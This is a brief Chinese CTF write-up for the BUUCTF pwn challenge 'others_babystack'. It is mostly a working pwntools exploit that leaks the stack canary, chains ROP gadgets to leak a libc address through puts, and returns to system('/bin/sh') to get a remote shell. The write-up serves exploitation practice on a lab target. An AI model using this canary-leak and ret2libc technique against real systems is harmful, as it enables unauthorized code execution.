20.5.26pwn做题记录

others_babystack
之前做过差不多的,只不过是改got表的,但是64位好久不做了,忘了好多
题目开启了canary保护
先看一下源码:

明显看到case1存在栈溢出漏洞,然后case2存在打印函数可以把canary打印出来,再在case3退出一下,利用一下漏洞就可以了
(注:我之前忘记了64位传参要用寄存器di,si,dx,cx,r8,r9的顺序)
exp:

from pwn import *
from LibcSearcher import LibcSearcher
#sh=process('./bs')
sh=remote('node3.buuoj.cn',28333)
elf=ELF('./bs')
context.log_level='debug'

puts_plt=0x400690
puts_got=elf.got['puts']
pop_di_addr=0x400a93
main_addr=0x400908

sh.recvuntil('>> ')
sh.sendline('1')
payload1='a'*0x88
sh.sendline(payload1)

sh.recvuntil('>> ')
sh.sendline('2')
sh.recvuntil('a\n')
canary=sh.recv(7)
canary=u64(canary.rjust(8,'\x00'))
print hex(canary)

payload2='a'*0x88+p64(canary)+'b'*8+p64(pop_di_addr)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
sh.recvuntil('>> ')
sh.sendline('1')
sh.sendline(payload2)

sh.recvuntil('>> ')
sh.sendline('3')

puts_addr=u64(sh.recv(6).ljust(8,'\x00'))
print hex(puts_addr)

libc=LibcSearcher('puts',puts_addr)
offset=puts_addr-libc.dump('puts')#ai
sys_addr=libc.dump('system')+offset
bin_addr=libc.dump('str_bin_sh')+offset
print offset
print libc.dump('system')
print libc.dump('str_bin_sh')

payload3='a'*0x88+p64(canary)+'b'*8+p64(pop_di_addr)+p64(bin_addr)+p64(sys_addr)
sh.recvuntil('>> ')
sh.sendline('1')
sh.sendline(payload3)
sh.sendlineafter('>> ','3')

sh.interactive()